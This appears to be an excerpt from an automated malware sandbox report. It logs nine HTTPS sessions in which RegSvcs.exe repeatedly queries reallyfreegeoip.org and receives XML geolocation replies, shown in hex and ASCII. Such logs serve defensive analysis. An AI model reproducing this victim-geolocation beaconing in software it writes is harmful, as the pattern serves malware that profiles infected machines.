2024-11-25 07:49:04 UTC	853	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 07:49:04 GMT Content-Type: text/xml Content-Length: 361 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 484853 Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Xq5xuqfP%2BTtrjMfIUdSMKhvigH5KnuU%2BzaSU%2BvO3FUJuvdNpVtJlyqoKErxVJ9wcOmBA14U5adrxNdI3m1p6mD63WobR0pAYMwjZHQehcErbhi6FVlcZ25TGwCEEZ5zoO%2BmciCz2"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e800a407b41efa5-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1987&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=698&delivery_rate=1432074&cwnd=187&unsent_bytes=0&cid=22a83f8f7bd1e390&ts=447&x=0"
2024-11-25 07:49:04 UTC	361	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49732	172.67.177.134	443	7488	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-25 07:49:06 UTC	60	OUT	GET /xml/8.46.123.75 HTTP/1.1 Host: reallyfreegeoip.org
2024-11-25 07:49:07 UTC	859	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 07:49:06 GMT Content-Type: text/xml Content-Length: 361 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 484855 Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NrbF7foaKRVkp2P%2F1YT1Ub60eSjy%2FIF7F5jSx%2Bz%2BgOXGDqv4U1oyvf43MSqCdXvpMo%2FDFPbKP2I7iCf41%2B58WtwJIUTUkOMkLzMWifyhzzJ82ejj74FyegFGyyNyWEzSr%2B7nZKWp"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e800a4de8460f75-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1475&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=698&delivery_rate=1872995&cwnd=227&unsent_bytes=0&cid=9b28b5ec4160afa7&ts=452&x=0"
2024-11-25 07:49:07 UTC	361	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49734	172.67.177.134	443	7488	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-25 07:49:09 UTC	84	OUT	GET /xml/8.46.123.75 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-11-25 07:49:10 UTC	847	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 07:49:10 GMT Content-Type: text/xml Content-Length: 361 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 484859 Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=g8LVXPWNdoe800CJ9JTIAkrPEOvcgQllJn3FsMZYvQ9WEz8BRkP27gVXrBx7XGfHuqnQXeFOncLTNnycPOsu2W7lx1oz2cDWEXlNMXNQlIO2sHOUTq1sV1ijivc3udKgjeU%2F2aPR"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e800a619d448cba-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1929&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=698&delivery_rate=1469552&cwnd=229&unsent_bytes=0&cid=7c3e8e04134906c3&ts=463&x=0"
2024-11-25 07:49:10 UTC	361	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49736	172.67.177.134	443	7488	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-25 07:49:12 UTC	84	OUT	GET /xml/8.46.123.75 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-11-25 07:49:13 UTC	851	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 07:49:13 GMT Content-Type: text/xml Content-Length: 361 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 484862 Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Aa3D83IzYg1EL4HVD2GVvwKPKRGBSQ4D%2BZnOIKzCcMCXQtbhU30IMcQVXd5eDaKwHSQEiSfv%2BdnA2CDKw9kEpgapt2g4x0qKmwIXZmvA0Iihy%2FfN4EdbQmQvYdPT50YlGo2xWcX0"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e800a755b4c188d-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1465&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=698&delivery_rate=1924851&cwnd=174&unsent_bytes=0&cid=18ebe947c84d36b5&ts=465&x=0"
2024-11-25 07:49:13 UTC	361	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49740	172.67.177.134	443	7488	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-25 07:49:16 UTC	84	OUT	GET /xml/8.46.123.75 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-11-25 07:49:16 UTC	847	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 07:49:16 GMT Content-Type: text/xml Content-Length: 361 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 484865 Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zE70HDLJ5TgLX8YMUGRItcGehdzYWCWcAhndFnVmrnzXc4Cq%2FepwCUB3sHuEwopxdaCahnYxY89a4ryQHnH1AMjk1A3fYksdAtOude6jz6wKB03bvKeAPiQlfUI0uQ19pOXu4D5o"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e800a891bb541e6-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1722&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=698&delivery_rate=1638608&cwnd=182&unsent_bytes=0&cid=a9f3bfb2c3a3a723&ts=457&x=0"
2024-11-25 07:49:16 UTC	361	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49741	172.67.177.134	443	7696	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-25 07:49:16 UTC	84	OUT	GET /xml/8.46.123.75 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-11-25 07:49:17 UTC	855	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 07:49:16 GMT Content-Type: text/xml Content-Length: 361 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 484865 Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OkeZ%2Fj%2B%2BbnF9cVLI0meCxBawtitjoDHbC9dzGY0DgeghSRYNTBKS4XDVh9SCX8LG2edFrYA%2BvToAL9X3ica4dbpQim699IRGDFY1j4ht4Le%2BR3dMS2daQtC9eamStsQmIvW4KGnu"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e800a8b889541bd-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1763&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2850&recv_bytes=698&delivery_rate=1654390&cwnd=247&unsent_bytes=0&cid=6b5288464d7e1e76&ts=465&x=0"
2024-11-25 07:49:17 UTC	361	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49744	172.67.177.134	443	7696	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-25 07:49:18 UTC	60	OUT	GET /xml/8.46.123.75 HTTP/1.1 Host: reallyfreegeoip.org
2024-11-25 07:49:19 UTC	855	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 07:49:19 GMT Content-Type: text/xml Content-Length: 361 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 484868 Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cG4hhanu8y%2FD%2FiePxiroKNzc3CiIdpWOyhvSgftSeZtYO8aJMHsMtzwBMcFW2GudDsSK9lDVZyqyAse9gDXBe71tCxN5oI1jZCBwkG%2FjmN4lrrqLwRZ7a07w8X%2ByP6F1wm%2BxHaOh"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e800a9b4f1378ed-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2031&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=698&delivery_rate=1427872&cwnd=182&unsent_bytes=0&cid=7b7789c703c241ce&ts=454&x=0"
2024-11-25 07:49:19 UTC	361	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49746	172.67.177.134	443	7488	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-25 07:49:19 UTC	84	OUT	GET /xml/8.46.123.75 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-11-25 07:49:19 UTC	855	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 07:49:19 GMT Content-Type: text/xml Content-Length: 361 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 484868 Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vy2iMp7R9SMpBj37e5ohCZNZVKJXjoXGUt52%2FS1QtABpu4d9P6hDCYn%2FfRKExpTHtu6NSc%2BsH8cih%2Bhtra0sXR3a7T8885BIK2qfxSXYXagB9iNQqXYO%2B9XVzrpuT5FObRdJnwQj"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e800a9d7bc8c425-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1472&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=698&delivery_rate=1935056&cwnd=239&unsent_bytes=0&cid=ff56246acc9d321c&ts=469&x=0"
2024-11-25 07:49:19 UTC	361	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49751	172.67.177.134	443	7696	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-25 07:49:22 UTC	60	OUT	GET /xml/8.46.123.75 HTTP/1.1 Host: reallyfreegeoip.org
2024-11-25 07:49:22 UTC	853	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 07:49:22 GMT Content-Type: text/xml Content-Length: 361 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 484871 Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GFGjCkJ66ye3MTv1kxecsGo4N%2Fzjm95%2FtNTcNNELZydMP8GCO8I59IO9K0ZGjZs9k7MAHs32FdaTfPGBB8kmpCTO8dEKe4nSub6amGx%2Fbxi6Ko%2Ff2ldrP4wamSK00QBwYY5A16BV"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e800aafacfd436d-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2001&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=698&delivery_rate=1407907&cwnd=160&unsent_bytes=0&cid=f450afde6d10d456&ts=473&x=0"
2024-11-25 07:49:22 UTC	361	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49752	172.67.177.134	443	7488	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-25 07:49:22 UTC	60	OUT	GET /xml/8.46.123.75 HTTP/1.1 Host: reallyfreegeoip.org
2024-11-25 07:49:22 UTC	845	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 07:49:22 GMT Content-Type: text/xml Content-Length: 361 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 484871 Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ngTNlKRourbfdZKUj7pgL00q0F1JDvlPaB2nP1Acgg9dHgBibVoFBL74D2O0X9LykpafiD0nBeVCOf0vWrEmvipR2hNK0bLHkItQwQL9HgiPmDJcE701AJ0uVF9Slhw9z9SVoIvq"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e800ab13c5bc448-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1483&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=698&delivery_rate=1902280&cwnd=228&unsent_bytes=0&cid=b04cd23bd0440025&ts=466&x=0"
2024-11-25 07:49:22 UTC	361	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon

